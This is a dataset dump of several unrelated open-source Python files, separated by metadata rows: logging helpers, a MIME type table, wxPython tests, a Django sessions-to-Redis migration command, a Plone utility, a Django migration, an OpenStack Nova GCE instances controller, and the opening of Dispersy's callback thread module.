signal.signal(signal.SIGUSR1, __SIGUSR_Handler)
__log_setup_complete = True
logging.debug( "debug logging enabled" )
def reopen_logfile(signum=None,frame=None):
'''Call me after rotating logs to reopen your logfile. Suitable
for using as a signal handler (e.g. after logrotation).'''
global __logfile_handler, __logfile_name
if not logging_is_setup():
abort( "must call setup_logging() before reopen_logfile()" )
rootLogger = logging.getLogger('')
rootLogger.removeHandler(__logfile_handler)
__logfile_handler = logging.FileHandler( __logfile_name )
__logfile_handler.setFormatter( logging.Formatter(__log_format) )
rootLogger.addHandler( __logfile_handler )
logging.info( "started new logfile" )
def logging_is_setup():
'''Returns True if setup_logging() has been called; false otherwise.'''
return __log_setup_complete
def __SIGUSR_Handler(signum, frame):
import signal
if signum == signal.SIGUSR1:
global __sigusr_handler
# If we haven't already created one, create it
if __sigusr_handler == None:
__sigusr_handler = sigusr_log_handler()
# set the timeout
__sigusr_handler.sigusr_timeout = time.time() + (30*60) # add 30 minutes
loglevel = logging.DEBUG
rootLogger = logging.getLogger('')
rootLogger.setLevel( loglevel )
rootLogger.addHandler( __sigusr_handler )
logging.debug( "SIGUSR1 Encountered - Begin DEBUG Logging" )
def abort( message ):
'''Log a fatal() message and exit the current process.
If you have cleanup to do, do it before calling me! Calling this
function also won't clean up pidfiles or anything else, under the
assumption that we'd like someone to be able to manually clean up
or inspect the state of the app later on.'''
logging.fatal( message )
os._exit(1)
|
UTF-8
|
Python
| false | false | 2,014 |
4,372,276,719,487 |
33fb31b4fb6e327f56a9f8550d968df1a3f54ab6
|
679be2df830e0795f012bbe1f8d6f8de3e371c24
|
/broadway/mpx/service/network/http/mime_types.py
|
05359fa69cd69de704f8744c3102623fd8960251
|
[] |
no_license
|
ed-aicradle/monotone
|
https://github.com/ed-aicradle/monotone
|
c98add2ce0468d583084953ee3f57bc9cbd4de73
|
57a23f85b8c18dfcea3e7d4cb194061ff86d2072
|
refs/heads/master
| 2021-05-27T08:18:28.655822 | 2013-01-30T00:31:10 | 2013-01-30T00:31:10 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""
Copyright (C) 2003 2007 2010 2011 Cisco Systems
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to:
The Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston, MA 02111-1307, USA.
As a special exception, if other files instantiate classes, templates
or use macros or inline functions from this project, or you compile
this file and link it with other works to produce a work based
on this file, this file does not by itself cause the resulting
work to be covered by the GNU General Public License. However
the source code for this file must still be made available in
accordance with section (3) of the GNU General Public License.
This exception does not invalidate any other reasons why a work
based on this file might be covered by the GNU General Public
License.
"""
table = {
'a': 'application/octet-stream',
'ai': 'application/postscript',
'aif': 'audio/x-aiff',
'aifc': 'audio/x-aiff',
'aiff': 'audio/x-aiff',
'au': 'audio/basic',
'avi': 'video/x-msvideo',
'bat': 'text/plain',
'bcpio': 'application/x-bcpio',
'bin': 'application/octet-stream',
'bmp': 'image/x-ms-bmp',
'c': 'text/plain',
'cdf': 'application/x-netcdf',
'class': 'application/octet-stream',
'cpio': 'application/x-cpio',
'cpt': 'application/mac-compactpro',
'csh': 'application/x-csh',
'css': 'text/css',
'dcr': 'application/x-director',
'dir': 'application/x-director',
'dll': 'application/octet-stream',
'dms': 'application/octet-stream',
'doc': 'application/msword',
'dot': 'application/msword',
'dvi': 'application/x-dvi',
'dxr': 'application/x-director',
'eml': 'message/rfc822',
'eps': 'application/postscript',
'etx': 'text/x-setext',
'exe': 'application/octet-stream',
'gif': 'image/gif',
'gtar': 'application/x-gtar',
'gz': 'application/x-gzip',
'h': 'text/plain',
'hdf': 'application/x-hdf',
'hqx': 'application/mac-binhex40',
'htm': 'text/html',
'html': 'text/html',
'ice': 'x-conference/x-cooltalk',
'ief': 'image/ief',
'jar': 'application/octet-stream',
'jpe': 'image/jpeg',
'jpeg': 'image/jpeg',
'jpg': 'image/jpeg',
'js': 'application/x-javascript',
'json': 'application/json',
'kar': 'audio/midi',
'ksh': 'text/plain',
'latex': 'application/x-latex',
'lha': 'application/octet-stream',
'lzh': 'application/octet-stream',
'm1v': 'video/mpeg',
'man': 'application/x-troff-man',
'me': 'application/x-troff-me',
'mht': 'message/rfc822',
'mhtml': 'message/rfc822',
'mid': 'audio/midi',
'midi': 'audio/midi',
'mif': 'application/x-mif',
'mov': 'video/quicktime',
'movie': 'video/x-sgi-movie',
'mp2': 'audio/mpeg',
'mp3': 'audio/mpeg',
'mpa': 'video/mpeg',
'mpe': 'video/mpeg',
'mpeg': 'video/mpeg',
'mpg': 'video/mpeg',
'mpga': 'audio/mpeg',
'ms': 'application/x-troff-ms',
'nc': 'application/x-netcdf',
'nws': 'message/rfc822',
'o': 'application/octet-stream',
'obj': 'application/octet-stream',
'oda': 'application/oda',
'p12': 'application/x-pkcs12',
'p7c': 'application/pkcs7-mime',
'pbm': 'image/x-portable-bitmap',
'pdb': 'chemical/x-pdb',
'pdf': 'application/pdf',
'pfx': 'application/x-pkcs12',
'pgm': 'image/x-portable-graymap',
'pl': 'text/plain',
'png': 'image/png',
'pnm': 'image/x-portable-anymap',
'pot': 'application/vnd.ms-powerpoint',
'ppa': 'application/vnd.ms-powerpoint',
'ppm': 'image/x-portable-pixmap',
'pps': 'application/vnd.ms-powerpoint',
'ppt': 'application/vnd.ms-powerpoint',
'ps': 'application/postscript',
'pwz': 'application/vnd.ms-powerpoint',
'py': 'text/x-python',
'pyc': 'application/x-python-code',
'pyo': 'application/x-python-code',
'qt': 'video/quicktime',
'ra': 'audio/x-pn-realaudio',
'ram': 'application/x-pn-realaudio',
'ras': 'image/x-cmu-raster',
'rdf': 'application/xml',
'rgb': 'image/x-rgb',
'roff': 'application/x-troff',
'rpm': 'audio/x-pn-realaudio-plugin',
'rtf': 'application/rtf',
'rtx': 'text/richtext',
'sgm': 'text/x-sgml',
'sgml': 'text/x-sgml',
'sh': 'application/x-sh',
'shar': 'application/x-shar',
'sit': 'application/x-stuffit',
'skd': 'application/x-koan',
'skm': 'application/x-koan',
'skp': 'application/x-koan',
'skt': 'application/x-koan',
'snd': 'audio/basic',
'so': 'application/octet-stream',
'src': 'application/x-wais-source',
'sv4cpio': 'application/x-sv4cpio',
'sv4crc': 'application/x-sv4crc',
'swf': 'application/x-shockwave-flash',
't': 'application/x-troff',
'tar': 'application/x-tar',
'tcl': 'application/x-tcl',
'tex': 'application/x-tex',
'texi': 'application/x-texinfo',
'texinfo': 'application/x-texinfo',
'tif': 'image/tiff',
'tiff': 'image/tiff',
'tr': 'application/x-troff',
'tsv': 'text/tab-separated-values',
'txt': 'text/plain',
'ustar': 'application/x-ustar',
'vcd': 'application/x-cdlink',
'vcf': 'text/x-vcard',
'vrml': 'x-world/x-vrml',
'wav': 'audio/x-wav',
'wiz': 'application/msword',
'wrl': 'x-world/x-vrml',
'xbm': 'image/x-xbitmap',
'xlb': 'application/vnd.ms-excel',
'xls': 'application/vnd.ms-excel',
'xml': 'text/xml',
'xpm': 'image/x-xpixmap',
'xsl': 'application/xml',
'xwd': 'image/x-xwindowdump',
'xyz': 'chemical/x-pdb',
'zip': 'application/zip'
}
|
UTF-8
|
Python
| false | false | 2,013 |
13,692,355,780,249 |
efc93f63100842ed3d4e6c4f854ac489da3c69c4
|
ba3abe876e84e7968f7966256563afdf65a5a596
|
/src/tests/test_gdi.py
|
88a2d8a97814b5b92ef3a3ca16f8a08f202c4eed
|
[
"MIT"
] |
permissive
|
ifwe/wxpy
|
https://github.com/ifwe/wxpy
|
6beefb6df537f2c860f477a605e0c056ad3a72f2
|
d76fd99bc8a714564657c01ba07650a21d7a215f
|
refs/heads/master
| 2016-09-06T10:48:48.476516 | 2012-07-18T18:52:10 | 2012-07-18T18:52:10 | 5,883,146 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import os.path
import wx
image_folder = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'images')
def test_Image():
imgpath = os.path.join(image_folder, 'digsby_ascii_popup.png')
assert os.path.exists(imgpath)
img = wx.Image(imgpath)
assert img.IsOk()
assert img.GetSize() == (362, 324)
assert img.GetWidth() == img.Width == 362
assert img.GetHeight() == img.Height == 324
assert img.GetRed(0, 0) == img.GetGreen(0, 0) == img.GetBlue(0, 0) == 255
img2 = img.Scale(50, 50)
assert img2.IsOk()
assert img2.GetSize() == (50, 50)
def test_Point():
p = wx.Point()
assert p.x == p.y == 0
p2 = wx.Point(10, 20)
assert p2.x == 10
assert p2.y == 20
p3 = wx.Point(5, 6)
assert p2 != p3
p4 = wx.Point(5, 6)
assert p3 == p4
assert p4 == p4
assert p[0] == p[1] == 0
assert p2[0] == 10
p[0] = 42
assert p[0] == p.x == 42
p[1] = p3[1]
assert p == wx.Point(42, 6)
assert p == (42, 6)
def test_Size():
s = wx.Size(1, 2)
assert s == (1, 2)
return
s = wx.Size()
assert s.x == s.y == 0
assert s == s
s2 = wx.Size(50, 60)
assert s != s2
s3 = wx.Size(50, 60)
assert s2 == s3
assert s3 == (50, 60)
def test_Rect():
r = wx.Rect()
attrs = 'X Y x y Width Height width height'.split()
assert all(0 == val for val in (getattr(r, a) for a in attrs))
r2 = wx.Rect(1, 2, 3, 4)
assert r2.x == r2.GetX() == 1
assert r2.y == r2.GetY() == 2
assert r2.width == r2.GetWidth() == r2.Width == 3
assert r2.height == r2.GetHeight() == r2.Height == 4
assert r2[:2] == r2.Position
assert r2.TopLeft == r2.GetTopLeft() == wx.Point(1, 2)
assert r2.TopRight == r2.GetTopRight() == wx.Point(3, 2)
assert r2.BottomLeft == r2.GetBottomLeft() == wx.Point(1, 5)
assert r2.BottomRight == r2.GetBottomRight() == wx.Point(3, 5)
assert r2 == (1, 2, 3, 4)
assert r2 != (4, 3, 2, 1)
r3 = wx.RectPS(wx.Point(20, 30), wx.Size(40, 50))
r4 = wx.RectPS((20, 30), (40, 50))
assert r3 == r4
r5 = r3.Inflate(10, 10)
r6 = wx.Rect(40, 40, 20, 20)
r6.Offset((20, -10))
assert r6 == (60, 30, 20, 20)
def test_Colour():
c = wx.Colour(33, 66, 99)
assert c.Red() == 33
assert c == wx.Colour(33, 66, 99) != wx.Colour(33, 66, 99, 254)
assert c != wx.Colour(99, 66, 33)
assert wx.Colour(*c) == c
assert (lambda *a: sum(a))(*wx.Colour(1,2,3,4)) == 10
# test color slicing
assert c[:2] == (33, 66)
assert c[:4] == (33, 66, 99, 255)
def test_Pen():
c = wx.Colour(213, 213, 213)
p = wx.Pen(c)
assert p.Colour == c == wx.Colour(213, 213, 213)
assert p.Width == 1
p.SetWidth(5)
assert p.Width == p.GetWidth() == 5
assert p.Style == p.GetStyle() == wx.SOLID
assert p.IsOk()
def main():
app = wx.PySimpleApp()
test_Colour()
#import memleak
#memleak.find(test_Rect, loops=50000)
if __name__ == '__main__':
main()
|
UTF-8
|
Python
| false | false | 2,012 |
11,132,555,276,078 |
71a48be589f5cd1f5c85468b4cfe75eacc5e829c
|
dd6096227f45f1eebc454a682910d5da0fcb5482
|
/redis_sessions/management/commands/migrate_db_sessions.py
|
81351cbaff471898121f8fcf848c85251b327060
|
[
"BSD-3-Clause"
] |
permissive
|
WoLpH/django-redis-sessions
|
https://github.com/WoLpH/django-redis-sessions
|
01e2711cbe7a176d9d06ddbffdde0cc78921292f
|
f3ed46c77db09e1aec6a92d723ce96d0d2950061
|
refs/heads/master
| 2023-09-05T06:51:00.355619 | 2012-02-20T13:54:08 | 2012-02-20T13:54:08 | 3,490,089 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import gc
import math
import time
import datetime
from django.core.management.base import BaseCommand
from django.contrib.sessions.models import Session
from redis_sessions.session import SessionStore
CHUNK_SIZE = 100000
class Command(BaseCommand):
'''Convert your database sessions to redis sessions
If this script is too slow, you can use this instead:
Put this query in `sessions.sql`:
COPY (
SELECT
'SETEX ' || session_key || ' '
|| DATE_PART('epoch', expire_date - NOW())::integer ||
' "' || session_data || '"'
FROM django_session
where expire_date > NOW()
)
TO STDOUT;
And execute this command:
# psql -f sessions.sql | redis-cli
'''
def handle(self, *args, **kwargs):
server = SessionStore().server
now = datetime.datetime.now()
self.sessions = Session.objects.filter(
expire_date__gte=now,
).values_list(
'session_key',
'session_data',
'expire_date',
)
self.start_progressbar()
pipe = server.pipeline(transaction=False)
for i, session in enumerate(self.sessions.iterator()):
session_key, session_data, expire_date = session
if i % CHUNK_SIZE == 0:
gc.collect()
if expire_date < now:
# this session is old, let's ignore it
continue
# convert the expire date to a ttl in seconds
delta = expire_date - now
ttl = (delta.days * 24 * 60 * 60) + delta.seconds
# set the key, value and ttl
pipe.set(session_key, session_data)
pipe.expire(session_key, ttl)
self.update_progressbar(i)
# execute all commands in 1 big pipeline
pipe.execute()
self.end_progressbar()
def start_progressbar(self):
self.total = self.sessions.count()
self.log = int(math.ceil(math.log(self.total) / math.log(10)))
self.progressbar = None
try:
import progressbar
self.progressbar = progressbar.ProgressBar(
widgets=[
progressbar.Percentage(),
' :: ',
progressbar.Counter(), '/%d' % self.total,
' :: ',
progressbar.ETA(),
' :: ',
progressbar.Bar(),
],
maxval=self.total,
poll=0.1,
)
except ImportError:
print 'Using the `progressbar` module is recommended to get a',
print 'pretty live progressbar.'
print
print 'Going to process %d items' % self.total
self.progressbar.start()
self.start = time.time()
def update_progressbar(self, value):
if self.progressbar:
self.progressbar.update(value)
else:
print '%0*d/%0*d' % (self.log, value, self.log, self.total)
def end_progressbar(self):
self.progressbar = None
delta = time.time() - self.start
print ('Processed %d sessions in %.3f seconds processing %.3f items '
'per second on average') % (
self.total,
delta,
self.total / delta,
)
|
UTF-8
|
Python
| false | false | 2,012 |
4,277,787,463,287 |
b9c8b1c43b415b556c9f5d16a86d9247a9136ffb
|
c98ff0704844f38264462ba24ff481843ce60e96
|
/collective/collage/blogging/browser/utils.py
|
07899c87e19e9e5d9e1d0acddc1257ab13863ff7
|
[
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] |
non_permissive
|
collective/collective.collage.blogging
|
https://github.com/collective/collective.collage.blogging
|
f53070b06d63a15df427eee6a988b7f9881d6748
|
c024f4191d178908568936024d80fea246d630a8
|
refs/heads/master
| 2023-03-22T14:54:20.415550 | 2012-10-13T19:45:53 | 2012-10-13T19:45:53 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from zope.interface import implements
from Products.Five.browser import BrowserView
from Products.CMFCore.utils import getToolByName
from Products.Collage.interfaces import ICollageAlias
from collective.blogging.interfaces import IBlogMarker
from collective.collage.blogging.interfaces import ICollageBloggingUtil
class CollageBloggingUtil(BrowserView):
"""
a public traversable utility that checks if a blog is enabled
"""
implements(ICollageBloggingUtil)
def should_include(self):
utils = getToolByName(self.context, 'plone_utils')
for row in self.context.folderlistingFolderContents():
for column in row.folderlistingFolderContents():
for item in column.folderlistingFolderContents():
if ICollageAlias.providedBy(item):
item=item.get_target()
if IBlogMarker.providedBy(item):
# return True
return False
return False
|
UTF-8
|
Python
| false | false | 2,012 |
7,292,854,493,732 |
7836f73e28c858d448b0dc37a8aa655e5abb7442
|
a13873717b4ef7864ad02b49ae6f4ff4222f548b
|
/nova/api/gce/instances.py
|
5963f5f004d32696c5a828803531298718f9f425
|
[
"Apache-2.0"
] |
permissive
|
cloudscaling/nova-gce
|
https://github.com/cloudscaling/nova-gce
|
612df8cfce0ff89831b7bebe22bbc3c585eee27f
|
0bed935f6d90190a1833bbb0d358935a1e70f9c7
|
HEAD
| 2016-08-08T11:44:38.967408 | 2012-10-15T21:24:24 | 2012-10-15T21:56:46 | 6,196,850 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Copyright 2012 Cloudscaling Group, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob
from nova.compute import api as compute_api
from nova.compute import utils as compute_utils
from nova.db.api import security_group_get_by_name_like
from nova.network import api as network_api
from nova.volume import api as volume_api
from nova.compute import instance_types
from nova.api.gce import errors
from nova.api.gce.views import instances as instances_view
from nova.api.gce.views import operations as operations_view
from nova.api.gce import wsgi as gce_wsgi
from nova.api.openstack import wsgi as openstack_wsgi
from nova.openstack.common import log as logging
from nova import exception
from nova import utils
LOG = logging.getLogger(__name__)
class Controller(openstack_wsgi.Controller):
_view_builder_class = instances_view.ViewBuilder
def __init__(self, **kwargs):
super(Controller, self).__init__(**kwargs)
self._compute_api = compute_api.API()
self._network_api = network_api.API()
self._volume_api = volume_api.API()
def index(self, req):
instances = self._get_instances(req)
return self._view_builder.index(req, instances)
def show(self, req, id):
context = req.environ['nova.context']
try:
instance = self._compute_api.get(context, id)
return self._view_builder.basic(req, instance)
except exception.NotFound:
raise webob.exc.HTTPNotFound()
def create(self, req, body):
context = req.environ['nova.context']
name = body['name']
machine_type = body['machineType']
networks = []
networks_names = []
groups_names = []
project_id = context.project_id
for net_iface in body['networkInterfaces']:
networks_names.append(net_iface['network'].split('/')[-1])
for net_name in networks_names:
try:
network_settings = self._network_api.get(context, net_name)
networks.append((network_settings['uuid'], None))
groups_names.extend([g.name for g
in security_group_get_by_name_like(context,
project_id, network_settings['uuid'])])
except exception.NetworkNotFound:
raise webob.exc.HTTPNotFound(_("Network not found"))
groups_names = list(set(groups_names))
image = body.get('image')
description = body['description']
zone = body['zone']
if image is None:
return operations_view.generate_operation(req,
"", 'insert',
errors.generate_error(req, u"Image not found"))
try:
metadata_list = body['metadata']['items']
except KeyError:
metadata_list = []
instance_metadata = dict([(x['key'], x['value']) for x
in metadata_list])
ssh_keys = instance_metadata.pop('sshKeys', None)
if ssh_keys:
key_name, key_data = ssh_keys.split('\n')[0].split(":")
else:
key_name = key_data = None
instance_disks = body.get('disks', [])
disks = []
for disk in instance_disks:
device_name = disk["deviceName"]
volume_id = disk["source"].split("/")[-1]
try:
self._volume_api.get(context, volume_id), device_name
disks.append({"volume_id": volume_id,
"device_name": device_name,
"volume_size": "",
"delete_on_termination": 0})
except exception.VolumeNotFound, e:
LOG.error("Volume (%s) doesn't exist", volume_id)
try:
instance_type = self._machine_type_ref_to_instance(machine_type)
image_name = self._image_ref_to_image(image)
(instances, resv_id) = self._compute_api.create(context,
instance_type,
image_name,
display_name=name,
display_description=description,
min_count=1,
max_count=1,
metadata=instance_metadata,
security_group=groups_names,
key_name=key_name,
key_data=key_data,
requested_networks=networks,
block_device_mapping=disks)
except exception.InstanceTypeNotFoundByName:
raise webob.exc.HTTPNotFound()
except exception.NetworkHostNotSet:
raise webob.exc.HTTPNotFound()
except exception.ImageNotFound:
raise webob.exc.HTTPNotFound()
instance_id = instances[0]["id"]
target_link = self._view_builder._get_links(req,
instance_id,
self._view_builder._collection_name)
operation_type = "insert"
return operations_view.generate_operation(req,
target_link, operation_type)
def delete(self, req, id):
ctxt = self._get_context(req)
try:
instance = self._compute_api.get(ctxt, id)
self._compute_api.delete(ctxt, instance)
except exception.InstanceNotFound:
raise webob.exc.HTTPNotFound()
target_link = self._view_builder._get_links(req,
instance['id'],
self._view_builder._collection_name)
operation_type = 'delete'
return operations_view.generate_operation(req,
target_link, operation_type)
def _get_context(self, req):
return req.environ['nova.context']
def _machine_type_ref_to_instance(self, machine_type_ref):
machine_type = machine_type_ref.split('/')[-1].replace("-", ".")
instance_type = instance_types.get_instance_type_by_name(
machine_type)
return instance_type
def _image_ref_to_image(self, image_ref):
return image_ref.split('/')[-1]
def _get_instances(self, req):
context = req.environ['nova.context']
search_opts = {}
search_opts['deleted'] = False
if context.project_id:
search_opts['project_id'] = context.project_id
else:
search_opts['user_id'] = context.user_id
instances = self._compute_api.get_all(context,
search_opts=search_opts)
return instances
def add_access_config(self, req, body, id):
context = req.environ['nova.context']
network_interface = req.GET.get('network_interface')
type_access_config = body.get('type')
name = body.get('name')
address = body.get('natIP')
if address is None:
return operations_view.generate_operation(req, "", "insert",
errors.generate_error(req, u"NAT IP not found"))
instance = self._compute_api.get(context, id)
cached_nwinfo = compute_utils.get_nw_info_for_instance(instance)
if not cached_nwinfo:
return operations_view.generate_operation(req, "", "insert",
errors.generate_error(req, \
u"No nw_info cache associated with instance"))
fixed_ips = cached_nwinfo.fixed_ips()
if not fixed_ips:
return operations_view.generate_operation(req, "", "insert",
errors.generate_error(req, \
u"No fixed ips associated to instance"))
if len(fixed_ips) > 1:
msg = _('multiple fixed_ips exist, using the first: %s')
LOG.warning(msg, fixed_ips[0]['address'])
try:
self._network_api.associate_floating_ip(context, instance,
floating_address=address,
fixed_address=fixed_ips[0]['address'])
except exception.FloatingIpAssociated:
return operations_view.generate_operation(req, "", "insert",
errors.generate_error(req,\
u"floating ip is already associated"))
except exception.NoFloatingIpInterface:
return operations_view.generate_operation(req, "", "insert",
errors.generate_error(req,\
u"l3driver call to add floating ip failed"))
except Exception:
return operations_view.generate_operation(req, "", "insert",
errors.generate_error(req, \
u"Error. Unable to associate floating ip"))
target_link = self._view_builder._get_links(req,
instance['id'],
self._view_builder._collection_name)
operation_type = 'insert'
return operations_view.generate_operation(req,
target_link, operation_type)
def delete_access_config(self, req, id):
context = req.environ['nova.context']
network_interface = req.GET.get('network_interface')
address = req.GET.get('access_config')
# get the floating ip object
floating_ip = self._network_api.get_floating_ip_by_address(context,
address)
# get the associated instance object (if any)
instance = get_instance_by_floating_ip_addr(self, context, address)
# disassociate if associated
if (instance and
floating_ip.get('fixed_ip_id')):
disassociate_floating_ip(self, context, instance, address)
target_link = self._view_builder._get_links(req,
instance['id'],
self._view_builder._collection_name)
operation_type = 'delete'
return operations_view.generate_operation(req,
target_link, operation_type)
else:
return operations_view.generate_operation(req, "", "delete",
errors.generate_error(req, u"Not found"))
def get_instance_by_floating_ip_addr(self, context, address):
snagiibfa = self._network_api.get_instance_id_by_floating_address
instance_id = snagiibfa(context, address)
if instance_id:
return self._compute_api.get(context, instance_id)
def disassociate_floating_ip(self, context, instance, address):
try:
self._network_api.disassociate_floating_ip(context, instance, address)
except exception.NotAuthorized:
raise webob.exc.HTTPUnauthorized()
except exception.FloatingIpNotAssociated:
msg = _('Floating ip is not associated')
raise webob.exc.HTTPBadRequest(explanation=msg)
def create_resource():
return gce_wsgi.GCEResource(Controller())
|
UTF-8
|
Python
| false | false | 2,012 |
10,402,410,811,552 |
10ec7664a1c1c328a0886300e8e37ad6572643b6
|
a807c430c41231dc02b0e6e15e19dbf92261c3e4
|
/mysite/lab/migrations/0005_auto_20141017_1911.py
|
0268ec188791a40a5ab6c17f13df0a3132932561
|
[] |
no_license
|
VDenis/Subject-NetworkProgramming-lab
|
https://github.com/VDenis/Subject-NetworkProgramming-lab
|
200fc0fc5c9a39757aa3c4f560b83acf26abe337
|
5056b823cd3ad2eafb255984e2a37d1762b7c260
|
refs/heads/master
| 2016-09-06T09:14:01.607937 | 2014-10-25T08:04:17 | 2014-10-25T08:04:17 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('lab', '0004_auto_20141017_0226'),
]
operations = [
migrations.AddField(
model_name='pagelaboratorywork',
name='student',
field=models.ForeignKey(default=0, to='lab.Student'),
preserve_default=False,
),
migrations.AddField(
model_name='pagelaboratorywork',
name='subject',
field=models.ManyToManyField(to='lab.Subject'),
preserve_default=True,
),
migrations.AddField(
model_name='subject',
name='professor',
field=models.ForeignKey(default=0, to='lab.Professor'),
preserve_default=False,
),
migrations.AlterField(
model_name='subject',
name='name',
field=models.CharField(max_length=75),
),
]
|
UTF-8
|
Python
| false | false | 2,014 |
6,416,681,160,797 |
2aa5e9071d92dc5ea5a79962027347203e5d9220
|
b61c708d29dab090c2ca87ab0ff56b2bbfb4704f
|
/callback.py
|
bf7b68e504c36be7d62e6f420a8c4e878eb32409
|
[] |
no_license
|
vladum/dispersy
|
https://github.com/vladum/dispersy
|
1564b8ae31b23253bea1f2f73bc16b197b5b7e4b
|
b8eab4fb501213ae151372cd83a6131582e2ad6b
|
refs/heads/master
| 2020-12-24T11:33:23.911402 | 2013-03-13T17:20:10 | 2013-03-13T17:20:10 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Python 2.5 features
from __future__ import with_statement
"""
A callback thread running Dispersy.
"""
from heapq import heappush, heappop
from thread import get_ident
from threading import Thread, Lock, Event, currentThread
from time import sleep, time
from types import GeneratorType, TupleType
from sys import exc_info
try:
import prctl
except ImportError:
prctl = None
from .decorator import attach_profiler
from .dprint import dprint
from .revision import update_revision_information
if __debug__:
from atexit import register as atexit_register
from inspect import getsourcefile, getsourcelines
from types import LambdaType
# dprint warning when registered call, or generator call, takes more than N seconds
CALL_DELAY_FOR_WARNING = 0.5
# dprint warning when registered call, or generator call, should have run N seconds ago
QUEUE_DELAY_FOR_WARNING = 1.0
# update version information directly from SVN
update_revision_information("$HeadURL$", "$Revision$")
class Callback(object):
if __debug__:
@staticmethod
def _debug_call_to_string(call):
# 10/02/12 Boudewijn: in python 2.5 generators do not have .__name__
if isinstance(call, TupleType):
if isinstance(call[0], LambdaType):
return "lambda@%s:%d" % (getsourcefile(call[0])[-25:], getsourcelines(call[0])[1])
else:
return call[0].__name__
elif isinstance(call, GeneratorType):
return call.__name__
else:
return str(call)
def __init__(self):
# _event is used to wakeup the thread when new actions arrive
self._event = Event()
self._event_set = self._event.set
self._event_is_set = self._event.isSet
# _lock is used to protect variables that are written to on multiple threads
self._lock = Lock()
# _thread_ident is used to detect when methods are called from the same thread
self._thread_ident = 0
# _state contains the current state of the thread. it is protected by _lock and follows the
# following states:
#
# --> fatal-exception -> STATE_EXCEPTION
# /
# STATE_INIT -> start() -> PLEASE_RUN -> STATE_RUNNING
# \ \
# --------------> stop() -> PLEASE_STOP -> STATE_FINISHED
#
self._state = "STATE_INIT"
if __debug__: dprint("STATE_INIT")
# _exception is set to SystemExit, KeyboardInterrupt, GeneratorExit, or AssertionError when
# any of the registered callbacks raises any of these exceptions. in this case _state will
# be set to STATE_EXCEPTION. it is protected by _lock
self._exception = None
self._exception_traceback = None
# _exception_handlers contains a list with callable functions of methods. all handlers are
# called whenever an exception occurs. first parameter is the exception, second parameter
# is a boolean indicating if the exception is fatal (i.e. True indicates SystemExit,
# KeyboardInterrupt, GeneratorExit, or AssertionError)
self._exception_handlers = []
# _id contains a running counter to ensure that every scheduled callback has its own unique
# identifier. it is protected by _lock
self._id = 0
# _requests are ordered by deadline and moved to -expired- when they need to be handled
# (deadline, priority, root_id, (call, args, kargs), callback)
self._requests = []
# expired requests are ordered and handled by priority
# (priority, root_id, None, (call, args, kargs), callback)
self._expired = []
# _requests_mirror and _expired_mirror contains the same list as _requests and _expired,
# respectively. when the callback closes _requests is set to a new empty list while
# _requests_mirror continues to point to the existing one. because all task 'deletes' are
# done on the _requests_mirror list, these actions will still be allowed while no new tasks
# will be accepted.
self._requests_mirror = self._requests
self._expired_mirror = self._expired
if __debug__:
def must_close(callback):
assert callback.is_finished
atexit_register(must_close, self)
self._debug_thread_name = ""
self._debug_call_name = None
@property
def ident(self):
return self._thread_ident
@property
def is_current_thread(self):
"""
Returns True when called on this Callback thread.
"""
return self._thread_ident == get_ident()
@property
def is_running(self):
"""
Returns True when the state is STATE_RUNNING.
"""
return self._state == "STATE_RUNNING"
@property
def is_finished(self):
"""
Returns True when the state is either STATE_FINISHED, STATE_EXCEPTION or STATE_INIT. In either case the
thread is no longer running.
"""
return self._state == "STATE_FINISHED" or self._state == "STATE_EXCEPTION" or self._state == "STATE_INIT"
@property
def exception(self):
"""
Returns the exception that caused the thread to exit when when any of the registered callbacks
raises either SystemExit, KeyboardInterrupt, GeneratorExit, or AssertionError.
"""
return self._exception
@property
def exception_traceback(self):
"""
Returns the traceback of the exception that caused the thread to exit when when any of the registered callbacks
"""
return self._exception_traceback
def attach_exception_handler(self, func):
"""
Attach a new exception notifier.
FUNC will be called whenever a registered call raises an exception. The first parameter
will be the raised exception, the second parameter will be a boolean indicating if the
exception was fatal.
Fatal exceptions are SystemExit, KeyboardInterrupt, GeneratorExit, or AssertionError. These
exceptions will cause the Callback thread to exit. The Callback thread will continue to
function on all other exceptions.
"""
assert callable(func), "handler must be callable"
with self._lock:
assert not func in self._exception_handlers, "handler was already attached"
self._exception_handlers.append(func)
def detach_exception_handler(self, func):
"""
Detach an existing exception notifier.
"""
assert callable(func), "handler must be callable"
with self._lock:
assert func in self._exception_handlers, "handler is not attached"
self._exception_handlers.remove(func)
def _call_exception_handlers(self, exception, fatal):
with self._lock:
exception_handlers = self._exception_handlers[:]
for exception_handler in exception_handlers:
try:
exception_handler(exception, fatal)
except Exception:
dprint(exception=True, level="error")
assert False, "the exception handler should not cause an exception"
def register(self, call, args=(), kargs=None, delay=0.0, priority=0, id_="", callback=None, callback_args=(), callback_kargs=None, include_id=False):
"""
Register CALL to be called.
The call will be made with ARGS and KARGS as arguments and keyword arguments, respectively.
ARGS must be a tuple and KARGS must be a dictionary.
CALL may return a generator object that will be repeatedly called until it raises the
StopIteration exception. The generator can yield floating point values to reschedule the
generator after that amount of seconds counted from the scheduled start of the call. It is
possible to yield other values, however, these are currently undocumented.
